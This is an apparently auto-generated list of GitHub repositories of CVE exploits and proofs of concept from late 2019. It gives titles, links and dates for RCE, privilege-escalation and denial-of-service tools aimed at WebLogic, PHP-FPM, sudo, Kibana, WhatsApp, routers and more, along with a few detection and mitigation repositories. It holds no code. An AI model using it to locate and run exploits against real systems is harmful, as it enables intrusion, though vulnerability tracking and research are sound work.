**Version-contains-cve-2019-12272** : [roguedream/lede-17.01.3](https://github.com/roguedream/lede-17.01.3) create time: 2019-12-06T22:04:24Z

**no description** : [SukaraLin/CVE-2019-2890](https://github.com/SukaraLin/CVE-2019-2890) create time: 2019-12-06T08:46:31Z

**Page Cache Side Channel Attacks (CVE-2019-5489) proof of concept for Linux** : [mmxsrup/CVE-2019-5489](https://github.com/mmxsrup/CVE-2019-5489) create time: 2019-12-06T05:37:08Z

**AppXSvc Arbitrary File Overwrite DoS** : [sgabe/CVE-2019-1476](https://github.com/sgabe/CVE-2019-1476) create time: 2019-12-05T21:00:16Z

**CVE-2019-5700** : [oscardagrach/CVE-2019-5700](https://github.com/oscardagrach/CVE-2019-5700) create time: 2019-12-05T19:54:33Z

**This is a filter bypass exploit that results in arbitrary file upload and remote code execution in class.upload.php <= 2.0.3** : [jra89/CVE-2019-19576](https://github.com/jra89/CVE-2019-19576) create time: 2019-12-04T15:01:00Z

**Chevereto - 1.0.0 Free - 1.1.4 Free, 3.13.4 Core, Remote Code Execution** : [jra89/CVE-2019-19511](https://github.com/jra89/CVE-2019-19511) create time: 2019-12-04T09:37:29Z

**Sudo Vulnerability CVE-2019-14287** : [Unam3dd/sudo-vulnerability-CVE-2019-14287](https://github.com/Unam3dd/sudo-vulnerability-CVE-2019-14287) create time: 2019-12-04T07:24:51Z

**Python Script Exploit SMB Usermap Script CVE-2007-2447** : [Unam3dd/exploit_smb_usermap_script](https://github.com/Unam3dd/exploit_smb_usermap_script) create time: 2019-12-03T18:25:41Z

**no description** : [frozenkp/CVE-2018-6574](https://github.com/frozenkp/CVE-2018-6574) create time: 2019-12-02T05:40:07Z

**no description** : [hekadan/CVE-2019-7609](https://github.com/hekadan/CVE-2019-7609) create time: 2019-12-01T14:29:22Z

**test for CVE-2018-6574: go get RCE pentesterlab** : [drset/golang](https://github.com/drset/golang) create time: 2019-11-29T14:12:57Z

**IE7 buffer overflow through an ANI file** : [Axua/CVE-2007-0038](https://github.com/Axua/CVE-2007-0038) create time: 2019-11-29T11:15:39Z

**no description** : [ze0r/cve-2019-1422](https://github.com/ze0r/cve-2019-1422) create time: 2019-11-29T02:58:32Z

**FreeFTPd 1.0.8 Post-Authentication Buffer Overflow via SIZE** : [cwinfosec/CVE-2019-19383](https://github.com/cwinfosec/CVE-2019-19383) create time: 2019-11-28T18:24:02Z

**Exploit for CVE-2017-12945.** : [aress31/cve-2017-12945](https://github.com/aress31/cve-2017-12945) create time: 2019-11-27T09:31:28Z

**guest→system(UAC手动提权)** : [sv3nbeast/CVE-2019-1388](https://github.com/sv3nbeast/CVE-2019-1388) create time: 2019-11-27T02:47:37Z

**Python script to exploit RCE in Nostromo nhttpd <= 1.9.6.** : [theRealFr13nd/CVE-2019-16278-Nostromo_1.9.6-RCE](https://github.com/theRealFr13nd/CVE-2019-16278-Nostromo_1.9.6-RCE) create time: 2019-11-26T14:15:44Z

**Exploit the dirtycow vulnerability to login as root** : [zakariamaaraki/Dirty-COW-CVE-2016-5195-](https://github.com/zakariamaaraki/Dirty-COW-CVE-2016-5195-) create time: 2019-11-26T01:18:41Z

**New Found 0-days!** : [TheCyberGeek/CVE-2019-19268](https://github.com/TheCyberGeek/CVE-2019-19268) create time: 2019-11-25T11:14:26Z

**CVE-2019-17558 Solr模板注入漏洞图形化一键检测工具。CVE-2019-17558 Solr Velocity Template Vul POC Tool.** : [SDNDTeam/CVE-2019-17558_Solr_Vul_Tool](https://github.com/SDNDTeam/CVE-2019-17558_Solr_Vul_Tool) create time: 2019-11-25T10:54:20Z

**no description** : [afbase/CVE-2017-10952](https://github.com/afbase/CVE-2017-10952) create time: 2019-11-24T02:01:24Z

**no description** : [nop-team/CVE-2019-11931](https://github.com/nop-team/CVE-2019-11931) create time: 2019-11-23T14:06:13Z

**no description** : [timwr/CVE-2019-5825](https://github.com/timwr/CVE-2019-5825) create time: 2019-11-23T11:35:34Z

**no description** : [crispy-peppers/Goahead-CVE-2017-17562](https://github.com/crispy-peppers/Goahead-CVE-2017-17562) create time: 2019-11-23T08:40:49Z

**no description** : [crispy-peppers/Libssh-server-CVE-2018-10933](https://github.com/crispy-peppers/Libssh-server-CVE-2018-10933) create time: 2019-11-23T07:22:25Z

**A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Simply takes a host and port that the web server is running on.** : [AnubisSec/CVE-2019-16278](https://github.com/AnubisSec/CVE-2019-16278) create time: 2019-11-22T18:35:14Z

**no description** : [ulisesrc/-2-CVE-2019-0708](https://github.com/ulisesrc/-2-CVE-2019-0708) create time: 2019-11-22T04:00:49Z

**Heap-buffer-overflow in Oniguruma (function fetch_interval_quantifier)** : [ManhNDd/CVE-2019-19204](https://github.com/ManhNDd/CVE-2019-19204) create time: 2019-11-21T23:53:16Z

**Heap-buffer-overflow in Oniguruma (function gb18030_mbc_enc_len)** : [ManhNDd/CVE-2019-19203](https://github.com/ManhNDd/CVE-2019-19203) create time: 2019-11-21T22:43:34Z

**CVE-2019-0232-Remote Code Execution on Apache Tomcat 7.0.42** : [setrus/CVE-2019-0232](https://github.com/setrus/CVE-2019-0232) create time: 2019-11-21T14:25:39Z

**no description** : [jaychouzzk/CVE-2019-1388](https://github.com/jaychouzzk/CVE-2019-1388) create time: 2019-11-21T08:38:38Z

**CVE-2019-1388 UAC提权 (nt authority\system)** : [jas502n/CVE-2019-1388](https://github.com/jas502n/CVE-2019-1388) create time: 2019-11-21T06:26:27Z

**1Password** : [GitHubAssessments/CVE_Assessments_11_2019](https://github.com/GitHubAssessments/CVE_Assessments_11_2019) create time: 2019-11-21T04:42:45Z

**no description** : [am6539/CVE-2019-3396](https://github.com/am6539/CVE-2019-3396) create time: 2019-11-21T03:07:08Z

**An integer overflow in the search_in_range function in regexec.c in Oniguruma 6.x before 6.9.4_rc2 leads to an out-of-bounds read** : [tarantula-team/CVE-2019-19012](https://github.com/tarantula-team/CVE-2019-19012) create time: 2019-11-20T14:32:23Z

**no description** : [l-iberty/cve-2012-1889](https://github.com/l-iberty/cve-2012-1889) create time: 2019-11-20T13:14:45Z

**Integer overflow in Oniguruma** : [ManhNDd/CVE-2019-19012](https://github.com/ManhNDd/CVE-2019-19012) create time: 2019-11-20T10:00:18Z

**no description** : [huang-emily/CVE-2010-3437](https://github.com/huang-emily/CVE-2010-3437) create time: 2019-11-19T23:35:57Z

**Ladon Scanner For Python, Large Network Penetration Scanner & Cobalt Strike, vulnerability / exploit / detection / MS17010/SmbGhost/CVE-2020-0796/CVE-2018-2894** : [k8gege/PyLadon](https://github.com/k8gege/PyLadon) create time: 2019-11-19T16:51:39Z

**Scripts that can be used to exploit CVE-2019-15972 which was an Authenticated SQLi issue in Cisco Unified Call Manager (UCM).** : [FSecureLABS/Cisco-UCM-SQLi-Scripts](https://github.com/FSecureLABS/Cisco-UCM-SQLi-Scripts) create time: 2019-11-19T16:38:39Z

**no description** : [random-robbie/CVE-2019-5418](https://github.com/random-robbie/CVE-2019-5418) create time: 2019-11-19T09:40:06Z

**Apache Solr RCE (ENABLE_REMOTE_JMX_OPTS="true")** : [jas502n/CVE-2019-12409](https://github.com/jas502n/CVE-2019-12409) create time: 2019-11-19T08:53:56Z

**Audacity** : [GitHubAssessments/CVE_Assessments_10_2019](https://github.com/GitHubAssessments/CVE_Assessments_10_2019) create time: 2019-11-19T04:51:56Z

**cve-2019-2618 需要用户名密码** : [ianxtianxt/cve-2019-2618](https://github.com/ianxtianxt/cve-2019-2618) create time: 2019-11-19T04:12:39Z

**CVE-2019-19033 description and scripts to check the vulnerability in Jalios JCMS 10 (Authentication Bypass)** : [ricardojoserf/CVE-2019-19033](https://github.com/ricardojoserf/CVE-2019-19033) create time: 2019-11-17T19:32:10Z

**remote debug environment for CLion** : [moniik/CVE-2019-11043_env](https://github.com/moniik/CVE-2019-11043_env) create time: 2019-11-17T05:16:02Z

**CVE-2019-0708** : [lwtz/CVE-2019-0708](https://github.com/lwtz/CVE-2019-0708) create time: 2019-11-17T03:28:28Z

**cve-2019-11931** : [kasif-dekel/whatsapp-rce-patched](https://github.com/kasif-dekel/whatsapp-rce-patched) create time: 2019-11-16T11:06:52Z

**Use RedxploitHQ to create a new Admin user into redwoodhq and get all the functions on the framework** : [EthicalHCOP/CVE-2019-12890_RedxploitHQ](https://github.com/EthicalHCOP/CVE-2019-12890_RedxploitHQ) create time: 2019-11-15T12:41:19Z

**The latest workaround for the "Query is corrupt" error introduced with CVE-2019-1402** : [lauxjpn/CorruptQueryAccessWorkaround](https://github.com/lauxjpn/CorruptQueryAccessWorkaround) create time: 2019-11-14T19:11:27Z

**Tools SQL Injection for CVE 2018-17254: Joomla Component JCKeditor 6.4.4 - 'parent' SQL Injection** : [FachrulRH/jckeditor](https://github.com/FachrulRH/jckeditor) create time: 2019-11-14T14:25:45Z

**Wordpress IgniteUp plugin < 3.4.1 allows unauthenticated users to arbitrarily delete files on the webserver possibly causing DoS.** : [administra1tor/CVE-2019-17234b-Exploit](https://github.com/administra1tor/CVE-2019-17234b-Exploit) create time: 2019-11-14T14:12:36Z

**Harbor 未授权创建管理员漏洞原理 docker及poc[基于pocsuite框架]** : [luckybool1020/CVE-2019-16097](https://github.com/luckybool1020/CVE-2019-16097) create time: 2019-11-14T10:19:47Z

**Joomla内核SQL注入漏洞原理、docker及poc[基于pocsuite框架]** : [luckybool1020/CVE-2018-8045](https://github.com/luckybool1020/CVE-2018-8045) create time: 2019-11-14T09:18:40Z

**Privilege Escalation: Weaponizing CVE-2019-1405 and CVE-2019-1322** : [apt69/COMahawk](https://github.com/apt69/COMahawk) create time: 2019-11-13T16:34:03Z

**no description** : [Sindayifu/CVE-2019-14287-CVE-2014-6271](https://github.com/Sindayifu/CVE-2019-14287-CVE-2014-6271) create time: 2019-11-13T14:17:19Z

**cve-2014-6271** : [wenyu1999/bash-shellshock](https://github.com/wenyu1999/bash-shellshock) create time: 2019-11-13T13:48:51Z

**CVE-2019-0708 DOS RDP** : [Hen51/CVE-2019-0708-DOS](https://github.com/Hen51/CVE-2019-0708-DOS) create time: 2019-11-13T10:49:51Z

**Suricata LUA scripts to detect CVE-2019-12255, CVE-2019-12256, CVE-2019-12258, and CVE-2019-12260** : [sud0woodo/Urgent11-Suricata-LUA-scripts](https://github.com/sud0woodo/Urgent11-Suricata-LUA-scripts) create time: 2019-11-12T20:43:46Z

**no description** : [dmaasland/mcafee-hip-CVE-2016-8007](https://github.com/dmaasland/mcafee-hip-CVE-2016-8007) create time: 2019-11-12T19:23:05Z

**no description** : [random-robbie/cve-2019-6715](https://github.com/random-robbie/cve-2019-6715) create time: 2019-11-12T14:47:25Z

**no description** : [Sindadziy/cve-2019-14287](https://github.com/Sindadziy/cve-2019-14287) create time: 2019-11-12T12:17:48Z

**no description** : [Sindadziy/cve-2014-6271](https://github.com/Sindadziy/cve-2014-6271) create time: 2019-11-12T12:10:09Z

**Exploit for CVE-2018-4407-Memory Corruption** : [pwnhacker0x18/iOS-Kernel-Crash](https://github.com/pwnhacker0x18/iOS-Kernel-Crash) create time: 2019-11-12T10:24:34Z

**no description** : [bobfuzzer/CVE-2019-18885](https://github.com/bobfuzzer/CVE-2019-18885) create time: 2019-11-12T05:50:00Z

**cve-2019-14287** : [wenyu1999/sudo-](https://github.com/wenyu1999/sudo-) create time: 2019-11-11T12:01:02Z

**load-scripts.php file, which purpose is to retrieve several JavaScript packages through one single request.** : [vineetkia/Wordpress-DOS-Attack-CVE-2018-6389](https://github.com/vineetkia/Wordpress-DOS-Attack-CVE-2018-6389) create time: 2019-11-11T11:48:03Z

**Ladon POC Moudle CVE-2019-11043 (PHP-FPM + Ngnix)** : [k8gege/CVE-2019-11043](https://github.com/k8gege/CVE-2019-11043) create time: 2019-11-11T11:29:54Z

**The official exploit for rConfig 3.9.2 Post-auth Remote Code Execution CVE-2019-16663** : [mhaskar/CVE-2019-16663](https://github.com/mhaskar/CVE-2019-16663) create time: 2019-11-10T18:28:11Z

**The official exploit for rConfig 3.9.2 Pre-auth Remote Code Execution CVE-2019-16662** : [mhaskar/CVE-2019-16662](https://github.com/mhaskar/CVE-2019-16662) create time: 2019-11-10T18:26:25Z

**A standalone POC for CVE-2019-12840** : [KrE80r/webmin_cve-2019-12840_poc](https://github.com/KrE80r/webmin_cve-2019-12840_poc) create time: 2019-11-09T17:48:39Z

**Centreon v.19.04 Remote Code Execution exploit (CVE-2019-13024)** : [get-get-get-get/Centreon-RCE](https://github.com/get-get-get-get/Centreon-RCE) create time: 2019-11-08T16:46:13Z

**Case study and POC of CVE-2017-12635: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation** : [assalielmehdi/CVE-2017-12635](https://github.com/assalielmehdi/CVE-2017-12635) create time: 2019-11-07T20:02:31Z

**no description** : [phongld97/detect-cve-2018-16858](https://github.com/phongld97/detect-cve-2018-16858) create time: 2019-11-07T07:40:49Z

**no description** : [vesche/CVE-2019-10475](https://github.com/vesche/CVE-2019-10475) create time: 2019-11-06T22:19:01Z

**CVE-2019-11043 PHP7.x RCE** : [0th3rs-Security-Team/CVE-2019-11043](https://github.com/0th3rs-Security-Team/CVE-2019-11043) create time: 2019-11-06T15:44:47Z

**CVE-2019-11043 && PHP7.x && RCE EXP** : [MRdoulestar/CVE-2019-11043](https://github.com/MRdoulestar/CVE-2019-11043) create time: 2019-11-06T14:53:13Z

**no description** : [create12138/CVE-2018-15982](https://github.com/create12138/CVE-2018-15982) create time: 2019-11-06T09:08:04Z

**CVE-2019-5010 Exploit PoC - Python Denial of Service via Malformed X.509v3 Extension** : [JonathanWilbur/CVE-2019-5010](https://github.com/JonathanWilbur/CVE-2019-5010) create time: 2019-11-06T07:26:43Z

**PoC for Webmin Package Update Authenticated Remote Command Execution** : [bkaraceylan/CVE-2019-12840_POC](https://github.com/bkaraceylan/CVE-2019-12840_POC) create time: 2019-11-05T19:22:45Z

**自用验证** : [he1dan/cve-2019-2618](https://github.com/he1dan/cve-2019-2618) create time: 2019-11-05T14:57:23Z

**CVE-2019-2725** : [ianxtianxt/CVE-2019-2725](https://github.com/ianxtianxt/CVE-2019-2725) create time: 2019-11-05T14:35:16Z

**CVE-2018-3245** : [ianxtianxt/CVE-2018-3245](https://github.com/ianxtianxt/CVE-2018-3245) create time: 2019-11-05T14:30:18Z

**CVE-2018-2893** : [ianxtianxt/CVE-2018-2893](https://github.com/ianxtianxt/CVE-2018-2893) create time: 2019-11-05T14:22:04Z

**CVE-2017-3506** : [ianxtianxt/CVE-2017-3506](https://github.com/ianxtianxt/CVE-2017-3506) create time: 2019-11-05T14:11:56Z

**CVE-2017-3248** : [ianxtianxt/CVE-2017-3248](https://github.com/ianxtianxt/CVE-2017-3248) create time: 2019-11-05T13:59:31Z

**Optional Mitigation Steps** : [ras313/CVE-2019-12314](https://github.com/ras313/CVE-2019-12314) create time: 2019-11-05T13:45:58Z

**(CVE-2017-10271)Java反序列化漏洞** : [ianxtianxt/-CVE-2017-10271-](https://github.com/ianxtianxt/-CVE-2017-10271-) create time: 2019-11-05T13:33:56Z

**Heap corruption in WhatsApp's media picker** : [NatleoJ/CVE-2019-11933](https://github.com/NatleoJ/CVE-2019-11933) create time: 2019-11-05T04:38:26Z

**CVE-2017-0005 POC** : [sheri31/0005poc](https://github.com/sheri31/0005poc) create time: 2019-11-05T04:18:08Z

**EXPLOITING CVE 2019-14205** : [security-kma/EXPLOITING-CVE-2019-14205](https://github.com/security-kma/EXPLOITING-CVE-2019-14205) create time: 2019-11-05T03:47:06Z

**weaponized radare2 vulnerability found by @CaptnBanana and blenk92** : [xooxo/CVE-2019-14745](https://github.com/xooxo/CVE-2019-14745) create time: 2019-11-04T22:31:27Z

**POC for CVE-2019-13720** : [cve-2019-13720/cve-2019-13720](https://github.com/cve-2019-13720/cve-2019-13720) create time: 2019-11-04T12:40:28Z

**no description** : [whoami0622/CVE-2019-7610](https://github.com/whoami0622/CVE-2019-7610) create time: 2019-11-04T02:42:40Z

**no description** : [FurqanKhan1/CVE-2019-13497](https://github.com/FurqanKhan1/CVE-2019-13497) create time: 2019-11-02T12:29:26Z

**no description** : [FurqanKhan1/CVE-2019-13496](https://github.com/FurqanKhan1/CVE-2019-13496) create time: 2019-11-02T11:41:25Z

**Standalone Python ≥3.6 RCE Unauthenticated exploit for Supervisor 3.0a1 to 3.3.2** : [ivanitlearning/CVE-2017-11610](https://github.com/ivanitlearning/CVE-2017-11610) create time: 2019-11-02T10:58:12Z

**Enpass** : [GitHubAssessments/CVE_Assessments_09_2019](https://github.com/GitHubAssessments/CVE_Assessments_09_2019) create time: 2019-11-01T18:49:12Z

**WebLogic EJBTaglibDescriptor XXE漏洞(CVE-2019-2888)** : [jas502n/CVE-2019-2888](https://github.com/jas502n/CVE-2019-2888) create time: 2019-11-01T16:44:51Z

**no description** : [angeloanatrella86/CVE-2019](https://github.com/angeloanatrella86/CVE-2019) create time: 2019-11-01T15:58:27Z

**Apache Solr remote code execution via dataImportHandler** : [Rapidsafeguard/Solr-RCE-CVE-2019-0192](https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192) create time: 2019-11-01T13:46:37Z

**CVE-2018-15473-Exploit** : [CaioCGH/EP4-redes](https://github.com/CaioCGH/EP4-redes) create time: 2019-11-01T06:39:57Z

**wait for exp.** : [evilangelplus/CVE-2019-10086](https://github.com/evilangelplus/CVE-2019-10086) create time: 2019-11-01T02:36:17Z

**Working exploit code for CVE-2019-17625** : [Ekultek/CVE-2019-17625](https://github.com/Ekultek/CVE-2019-17625) create time: 2019-10-31T03:40:07Z

**no description** : [3rg1s/CVE-2016-2098](https://github.com/3rg1s/CVE-2016-2098) create time: 2019-10-30T12:36:38Z

**Docker image and commands to check CVE-2019-11043 vulnerability on nginx/php-fpm applications.** : [ypereirareis/docker-CVE-2019-11043](https://github.com/ypereirareis/docker-CVE-2019-11043) create time: 2019-10-30T10:22:41Z

**Python exp for CVE-2019-11043** : [huowen/CVE-2019-11043](https://github.com/huowen/CVE-2019-11043) create time: 2019-10-29T11:16:12Z

**Exploit for CVE-2017-8465** : [nghiadt1098/CVE-2017-8465](https://github.com/nghiadt1098/CVE-2017-8465) create time: 2019-10-29T09:06:23Z

**Clone code from https://github.com/v-gift/CVE-2019-2890** : [Ky0-HVA/CVE-2019-2890](https://github.com/Ky0-HVA/CVE-2019-2890) create time: 2019-10-29T08:53:28Z

**no description** : [Mayter/CVE-2019-1315](https://github.com/Mayter/CVE-2019-1315) create time: 2019-10-29T08:36:25Z

**no description** : [cchang27/CVE-2018-11235-test](https://github.com/cchang27/CVE-2018-11235-test) create time: 2019-10-29T04:49:45Z

**CVE-2019-11043 PHP远程代码执行** : [shadow-horse/cve-2019-11043](https://github.com/shadow-horse/cve-2019-11043) create time: 2019-10-28T15:31:34Z

**CVE-2018-6574 go get RCE** : [asavior2/CVE-2018-6574](https://github.com/asavior2/CVE-2018-6574) create time: 2019-10-28T13:05:12Z

**(PoC) Python version of CVE-2019-11043 exploit by neex** : [theMiddleBlue/CVE-2019-11043](https://github.com/theMiddleBlue/CVE-2019-11043) create time: 2019-10-28T11:09:06Z

**TEST** : [JonathanZhou348/CVE-2019-3396TEST](https://github.com/JonathanZhou348/CVE-2019-3396TEST) create time: 2019-10-28T08:43:40Z

**weblogic_cve-2019-2888** : [21superman/weblogic_cve-2019-2888](https://github.com/21superman/weblogic_cve-2019-2888) create time: 2019-10-28T06:10:44Z

**no description** : [huang919/cve-2019-14287-PPT](https://github.com/huang919/cve-2019-14287-PPT) create time: 2019-10-28T03:27:23Z

**apache axis1.4远程代码执行漏洞** : [ianxtianxt/cve-2019-0227](https://github.com/ianxtianxt/cve-2019-0227) create time: 2019-10-27T14:42:54Z

**Exploit POC for the bug CVE-2019-8781, found by @LinusHenze** : [TrungNguyen1909/CVE-2019-8781-macOS](https://github.com/TrungNguyen1909/CVE-2019-8781-macOS) create time: 2019-10-27T10:28:35Z

**FUDForum 3.0.9 - XSS / Remote Code Execution (CVE-2019-18873, CVE-2019-18839)** : [fuzzlove/FUDforum-XSS-RCE](https://github.com/fuzzlove/FUDforum-XSS-RCE) create time: 2019-10-27T03:07:26Z

**CVE-2019-10149 : A flaw was found in Exim versions 4.87 to 4.91 (inclusive). Improper validation of recipient address in deliver_message() function in /src/deliver.c may lead to remote command execution.** : [Diefunction/CVE-2019-10149](https://github.com/Diefunction/CVE-2019-10149) create time: 2019-10-27T01:03:11Z

**CVE-2000-0979** : [Z6543/CVE-2000-0979](https://github.com/Z6543/CVE-2000-0979) create time: 2019-10-26T14:40:17Z

**This repository details CVE-2020-6650, a vulnerability I discovered within Eaton's UPS Companion. All users should upgrade to v1.06 immediately or else they risk remote administrator access to their system.** : [RavSS/Eaton-UPS-Companion-Exploit](https://github.com/RavSS/Eaton-UPS-Companion-Exploit) create time: 2019-10-25T23:06:20Z

**CVE-2015-7547 initial research.** : [Stick-U235/CVE-2015-7547](https://github.com/Stick-U235/CVE-2015-7547) create time: 2019-10-24T15:02:23Z

**no description** : [akamajoris/CVE-2019-11043-Docker](https://github.com/akamajoris/CVE-2019-11043-Docker) create time: 2019-10-24T12:32:02Z

**no description** : [fairyming/CVE-2019-11043](https://github.com/fairyming/CVE-2019-11043) create time: 2019-10-24T09:12:38Z

**no description** : [ianxtianxt/CVE-2019-11043](https://github.com/ianxtianxt/CVE-2019-11043) create time: 2019-10-24T09:09:01Z

**PHP-FPM Remote Code Execution Vulnerability (CVE-2019-11043) POC in Python** : [AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-](https://github.com/AleWong/PHP-FPM-Remote-Code-Execution-Vulnerability-CVE-2019-11043-) create time: 2019-10-24T05:28:41Z

**Remote Code Execution Vulnerability in Webmin** : [AleWong/WebminRCE-EXP-CVE-2019-15107-](https://github.com/AleWong/WebminRCE-EXP-CVE-2019-15107-) create time: 2019-10-24T05:19:20Z

**php-fpm+Nginx RCE** : [jas502n/CVE-2019-11043](https://github.com/jas502n/CVE-2019-11043) create time: 2019-10-23T23:26:57Z

**CVE-2019-16278 Python3 Exploit Code** : [darkerego/Nostromo_Python3](https://github.com/darkerego/Nostromo_Python3) create time: 2019-10-23T22:24:18Z

**no description** : [ictnamanh/CVE-2017-9248](https://github.com/ictnamanh/CVE-2017-9248) create time: 2019-10-23T13:57:11Z

**no description** : [tinker-li/CVE-2019-11043](https://github.com/tinker-li/CVE-2019-11043) create time: 2019-10-23T13:34:28Z

**CVE-2019-11043** : [B1gd0g/CVE-2019-11043](https://github.com/B1gd0g/CVE-2019-11043) create time: 2019-10-23T13:32:14Z

**Sudo Flaw Linux Users Can Run Commands As Root Even When They're Restricted** : [kumar1100/CVE2019-14287](https://github.com/kumar1100/CVE2019-14287) create time: 2019-10-23T13:26:43Z

**Double-free vulnerability in DDGifSlurp in decoding.c in libpl_droidsonroids_gif can read more https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/** : [mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit](https://github.com/mRanonyMousTZ/CVE-2019-11932-whatsApp-exploit) create time: 2019-10-23T08:02:15Z

**no description** : [leonardo1101/cve-2017-11176](https://github.com/leonardo1101/cve-2017-11176) create time: 2019-10-23T00:16:03Z

**no description** : [pr0tean/CVE-2019-13051](https://github.com/pr0tean/CVE-2019-13051) create time: 2019-10-22T15:00:48Z

**no description** : [SECFORCE/CVE-2018-1000082-exploit](https://github.com/SECFORCE/CVE-2018-1000082-exploit) create time: 2019-10-22T13:02:02Z

**脏牛Linux本地提权漏洞复现(CVE-2016-5195)** : [imust6226/dirtcow](https://github.com/imust6226/dirtcow) create time: 2019-10-22T07:18:06Z

**exploit CVE-2019-7609(kibana RCE) on right way by python2 scripts** : [LandGrey/CVE-2019-7609](https://github.com/LandGrey/CVE-2019-7609) create time: 2019-10-21T15:31:13Z

**Rails Asset Pipeline Directory Traversal Vulnerability** : [mpgn/CVE-2018-3760](https://github.com/mpgn/CVE-2018-3760) create time: 2019-10-21T14:15:09Z

**Instructions for installing a vulnerable version of Exim and its expluatation** : [darsigovrustam/CVE-2019-10149](https://github.com/darsigovrustam/CVE-2019-10149) create time: 2019-10-21T08:13:27Z

**RCE on Kibana versions before 5.6.15 and 6.6.0 in the Timelion visualizer** : [mpgn/CVE-2019-7609](https://github.com/mpgn/CVE-2019-7609) create time: 2019-10-21T07:32:31Z

**CVE-2017-9506** : [pwn1sher/jira-ssrf](https://github.com/pwn1sher/jira-ssrf) create time: 2019-10-21T07:26:18Z

**no description** : [Janette88/cve-2019-14287sudoexp](https://github.com/Janette88/cve-2019-14287sudoexp) create time: 2019-10-21T01:54:45Z

**cve2019-2215 poc for 3.18 kernel** : [CrackerCat/cve2019-2215-3.18](https://github.com/CrackerCat/cve2019-2215-3.18) create time: 2019-10-21T01:46:26Z

**RCE Exploit For CVE-2019-17424 (nipper-ng 0.11.10)** : [guywhataguy/CVE-2019-17424](https://github.com/guywhataguy/CVE-2019-17424) create time: 2019-10-20T21:20:28Z

**Demonstration of Go's dsa.Verify bug (CVE-2019-17596)** : [pquerna/poc-dsa-verify-CVE-2019-17596](https://github.com/pquerna/poc-dsa-verify-CVE-2019-17596) create time: 2019-10-19T23:32:02Z

**Metasploit module & Python script for CVE-2019-16405** : [TheCyberGeek/CVE-2019-16405.rb](https://github.com/TheCyberGeek/CVE-2019-16405.rb) create time: 2019-10-18T21:50:37Z

**CVE-2019-17080** : [materaj2/Mintinstall-object-injection](https://github.com/materaj2/Mintinstall-object-injection) create time: 2019-10-18T18:52:17Z

**Sudo Security Bypass (CVE-2019-14287)** : [shallvhack/Sudo-Security-Bypass-CVE-2019-14287](https://github.com/shallvhack/Sudo-Security-Bypass-CVE-2019-14287) create time: 2019-10-18T04:11:14Z

**kibana < 6.6.0 未授权远程代码命令执行 (Need Timelion And Canvas),CVE-2019-7609** : [jas502n/kibana-RCE](https://github.com/jas502n/kibana-RCE) create time: 2019-10-18T03:25:22Z

**Authenticated Stored XSS in LifeRay 7.2.0 GA1 via MyAccountPortlet executed by Search Results** : [3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934](https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934) create time: 2019-10-17T22:09:07Z

**CVE-2012-5960, CVE-2012-5959 Proof of Concept** : [finn79426/CVE-2012-5960-PoC](https://github.com/finn79426/CVE-2012-5960-PoC) create time: 2019-10-17T09:02:12Z

**CVE-2019-2890 Exploit for WebLogic with T3** : [ZO1RO/CVE-2019-2890](https://github.com/ZO1RO/CVE-2019-2890) create time: 2019-10-17T02:46:00Z

**PoC for CVE-2017-18635** : [ShielderSec/CVE-2017-18635](https://github.com/ShielderSec/CVE-2017-18635) create time: 2019-10-16T21:27:40Z

**Programa para hackear Whatsapp Mediante Gif ,asiendo un exploit con el puerto.** : [fastmo/CVE-2019-11932](https://github.com/fastmo/CVE-2019-11932) create time: 2019-10-16T20:13:23Z

**Standalone Python 3 exploit for CVE-2017-17562** : [ivanitlearning/CVE-2017-17562](https://github.com/ivanitlearning/CVE-2017-17562) create time: 2019-10-16T16:28:27Z

**D-Link DIR-859 - RCE UnAutenticated (CVE-2019–17621)** : [s1kr10s/D-Link-DIR-859-RCE](https://github.com/s1kr10s/D-Link-DIR-859-RCE) create time: 2019-10-16T15:32:45Z

**no description** : [gurneesh/CVE-2019-14287-write-up](https://github.com/gurneesh/CVE-2019-14287-write-up) create time: 2019-10-16T14:47:08Z

**CVE 2019-2215 Android Binder Use After Free** : [marcinguy/CVE-2019-2215](https://github.com/marcinguy/CVE-2019-2215) create time: 2019-10-16T11:27:44Z

**This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.** : [valbrux/CVE-2019-11932-SupportApp](https://github.com/valbrux/CVE-2019-11932-SupportApp) create time: 2019-10-16T10:04:30Z

**Sudo exploit** : [n0w4n/CVE-2019-14287](https://github.com/n0w4n/CVE-2019-14287) create time: 2019-10-15T19:26:42Z

**This is a container built for demonstration purposes that has a version of the sudo command which is vulnerable to CVE-2019-14287** : [CashWilliams/CVE-2019-14287-demo](https://github.com/CashWilliams/CVE-2019-14287-demo) create time: 2019-10-15T17:58:36Z

**Exploit and Mass Pwn3r for CVE-2019-16920** : [pwnhacker0x18/CVE-2019-16920-MassPwn3r](https://github.com/pwnhacker0x18/CVE-2019-16920-MassPwn3r) create time: 2019-10-15T17:54:03Z

**CVE-2019-16278Nostromo httpd命令执行** : [ianxtianxt/CVE-2019-16278](https://github.com/ianxtianxt/CVE-2019-16278) create time: 2019-10-15T12:47:59Z

**(CVE-2019-16279)dos** : [ianxtianxt/CVE-2019-16279](https://github.com/ianxtianxt/CVE-2019-16279) create time: 2019-10-15T12:43:28Z

**CVE-2019-16728 Proof of Concept** : [imjdl/CVE-2019-16278-PoC](https://github.com/imjdl/CVE-2019-16278-PoC) create time: 2019-10-15T09:22:36Z

**Opera Mini Location Permission Spoof Vulnerability** : [c0d3G33k/CVE-2018-16135](https://github.com/c0d3G33k/CVE-2018-16135) create time: 2019-10-15T08:50:54Z

**no description** : [sharmasandeepkr/cve-2018-8389](https://github.com/sharmasandeepkr/cve-2018-8389) create time: 2019-10-15T07:09:02Z

**no description** : [sharmasandeepkr/cve-2018-12798](https://github.com/sharmasandeepkr/cve-2018-12798) create time: 2019-10-15T07:05:12Z

**no description** : [sharmasandeepkr/cve-2018-9951](https://github.com/sharmasandeepkr/cve-2018-9951) create time: 2019-10-15T07:02:34Z

**no description** : [sharmasandeepkr/PS-2018-002---CVE-2018-14442](https://github.com/sharmasandeepkr/PS-2018-002---CVE-2018-14442) create time: 2019-10-15T06:58:27Z

